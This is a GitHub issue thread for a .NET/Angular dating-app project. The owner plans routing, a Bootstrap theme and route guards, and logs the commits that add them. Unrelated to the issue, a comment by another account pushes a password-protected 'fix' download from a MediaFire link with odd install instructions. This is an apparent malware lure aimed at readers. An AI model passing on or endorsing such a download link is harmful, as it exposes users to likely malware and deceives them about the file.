### ISSUE TITLE
Implement Angular routing

### ISSUE THREAD

**Issue by thewickermilko** [thewickermilko/DatingApp-net8#24]
1. Add solution to navigate through different components
2. Add a bootstrap theme
3. Use Angular route guards

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by thewickermilko** [comment]
[81bbeb7](https://github.com/thewickermilko/DatingApp-net8/commit/81bbeb7763785a8beb059b8a3a0c4485d1f651ce)
Added "list", "member-detail", "member-list" and "messages" components.

**Comment by thewickermilko** [comment]
[c18ef9a](https://github.com/thewickermilko/DatingApp-net8/commit/c18ef9a74aaad0a6e304bf355dd21097290922e2) - 
"nav.component.html" - added links for "Dating App", "Matches", "Lists" and "Messages".

**Comment by thewickermilko** [comment]
[5ad465f](https://github.com/thewickermilko/DatingApp-net8/commit/5ad465fcda1c9c73a0fb2d1f23baf95140d18a55) - 
https://www.npmjs.com/package/ngx-toastr - "toastr" used in the project.

**Comment by thewickermilko** [comment]
[1777fe9](https://github.com/thewickermilko/DatingApp-net8/commit/1777fe90d04fb7126cdf90ce44cce0cc01a4b04c)
 - 
Created "auth.guard.ts"

**Comment by thewickermilko** [comment]
[ef8a84b](https://github.com/thewickermilko/DatingApp-net8/commit/ef8a84b1062560eba22f8ee1661f41e74359f013)
 - https://bootswatch.com/united/ - Bootswatch theme used.
"angular.json" - line 25 - theme imported.
